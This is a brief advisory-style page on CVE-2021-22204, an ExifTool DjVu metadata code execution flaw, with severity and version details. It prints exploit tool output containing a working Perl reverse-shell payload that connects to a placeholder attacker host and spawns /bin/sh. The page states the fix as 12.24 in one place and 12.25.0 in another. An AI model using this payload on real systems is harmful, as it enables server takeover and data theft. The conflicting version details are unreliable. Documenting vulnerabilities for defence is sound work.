CVE-2021-22204:
ExifTool DjVu RCE
CVE-2021-22204 is an arbitrary code execution flaw in ExifTool’s DjVu parsing (ExifTool 7.44–12.23) where a specially crafted “image” with hostile DjVu metadata can trigger unsafe evaluation during parsing. It was disclosed and published as a CVE in April 2021 (NVD/CVE record published April 23, 2021) and was fixed upstream in ExifTool 12.24. If a vulnerable app runs ExifTool on attacker-supplied files (common in upload/metadata pipelines), it can lead to remote command execution with the service’s privileges, enabling full server compromise and data theft.
Below are general examples of techniques, methods, and proof-of-concept approaches used to demonstrate this vulnerability in a controlled environment.
_ __,~~~/_ __ ___ _______________ ___ ___
,~~`( )_( )-\| / / / / |/ / _/ ___/ __ \/ _ \/ _ \
|/| `--. / /_/ / // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
RUNNING: UNICORD Exploit for CVE-2021-22204
PAYLOAD: (metadata "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($LPORT,inet_aton('$LHOST')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};")
RUNTIME: DONE - Exploit image written to 'image.jpg'
6.8
Medium risk
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
Compexity
low
Privileges
none
Authentication
none
Affected
<12.25.0
Patched
>=12.25.0